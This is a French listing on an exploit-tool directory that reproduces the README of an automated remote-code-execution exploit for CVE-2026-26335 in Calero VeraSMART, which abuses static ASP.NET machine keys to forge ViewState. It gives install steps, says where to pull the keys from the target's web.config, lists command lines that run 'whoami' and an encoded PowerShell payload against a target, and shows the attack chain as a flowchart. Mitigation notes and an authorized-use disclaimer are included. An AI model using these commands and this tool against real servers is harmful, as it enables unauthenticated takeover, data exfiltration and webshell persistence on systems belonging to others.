Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — Exploit automatisé pour CVE-2026-26335, une RCE critique non authentifiée dans Calero VeraSMART via un ViewState ASP.NET falsifié utilisant des clés machine statiques. Inclut la découverte de points de terminaison, la génération de charges utiles et l'exécution de commandes. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed Teaming
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

CVE-2026-26335-Calero-VeraSMART-RCE

Exploit automatisé pour CVE-2026-26335, une RCE critique non authentifiée dans Calero VeraSMART via un ViewState ASP.NET falsifié utilisant des clés machine statiques. Inclut la découverte de points de terminaison, la génération de charges utiles et l'exécution de commandes.

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

👤 Auteur

Mohammed Idrees Banyamer Chercheur en sécurité

  • GitHub : https://github.com/mbanyamer
  • Instagram : https://instagram.com/banyamer_security

CVE-2026-26335 - Exploit RCE ViewState Calero VeraSMART

CVE Severity CVSS Platform ASP.NET Python License Author


📌 Description

CVE‑2026‑26335 est une vulnérabilité critique d'exécution de code à distance non authentifiée dans Calero VeraSMART (avant 2022 R1).

L'application utilise des clés machine ASP.NET statiques codées en dur partagées entre les installations.
Un attaquant disposant de ces clés peut forger un ViewState ASP.NET malveillant et déclencher une désérialisation côté serveur → RCE.

Cet exploit automatise :

  • La découverte du point de terminaison ViewState
  • L'extraction de __VIEWSTATEGENERATOR
  • La génération de la charge utile ysoserial
  • La livraison d'un ViewState signé
  • L'exécution de commandes

⚠️ Impact

  • RCE non authentifiée
  • Compromission de l'utilisateur IIS
  • Mouvement latéral dans le domaine
  • Exfiltration de données
  • Persistance via webshell

🧠 Cause racine

CWE‑321 — Clés cryptographiques codées en dur

Les déploiements VeraSMART réutilisent une machineKey ASP.NET identique :

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

Tout attaquant disposant des clés d'une installation peut attaquer toutes les autres.


🛠 Prérequis

  • Python 3
  • ysoserial.net
  • Clés machine VeraSMART
  • Accès réseau à IIS

⚙️ Installation

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 Obtention des clés machine

Les clés ne sont pas publiques. Obtenez-les depuis la cible :

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

Ou via la lecture de fichier complémentaire :

CVE‑2026‑26333


🚀 Utilisation

Vérifier la vulnérabilité

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

Exécuter une commande

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

Point de terminaison spécifique

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

Débogage via proxy

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 Flux d'exploitation

  1. Trouver le point de terminaison ViewState
  2. Extraire le générateur
  3. Générer la charge utile signée
  4. Envoyer le ViewState forgé
  5. Désérialisation ASP.NET
  6. Exécution de commandes

📊 CVSS

9.8 — Critique AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 Testé sur

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (avant R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 Atténuation

Corrigé dans VeraSMART 2022 R1 :

  • Clés machine uniques
  • Durcissement de ViewState
  • Stockage sécurisé des clés

Solutions de contournement :

  • Rotation de machineKey
  • Désactivation de ViewState
  • Restriction de l'exposition IIS
  • Règles WAF pour ViewState

📚 Références

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ Avertissement

À des fins éducatives et de tests autorisés uniquement. Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation d'évaluer.


👤 Auteur

Mohammed Idrees Banyamer Chercheur en sécurité

  • GitHub : https://github.com/mbanyamer
  • Instagram : https://instagram.com/banyamer_security

📊 Schéma de l'exploit

Le schéma suivant illustre la chaîne d'exploitation de CVE‑2026‑26335 dans Calero VeraSMART, où les clés machine ASP.NET statiques permettent de forger un ViewState malveillant conduisant à une exécution de code à distance.

root@kitploit:~
flowchart LR
    A[Attaquant] --> B[Obtenir la machineKey VeraSMART]
    B --> C[Découvrir le point de terminaison ViewState]
    C --> D[Extraire __VIEWSTATEGENERATOR]
    D --> E[Générer un ViewState malveillant via ysoserial]
    E --> F[Signer la charge utile avec machineKey]
    F --> G[Envoyer une requête POST forgée]
    G --> H[Désérialisation ViewState ASP.NET]
    H --> I[Gadget TypeConfuseDelegate]
    I --> J[Exécution de code à distance sur IIS]
Télécharger l’outil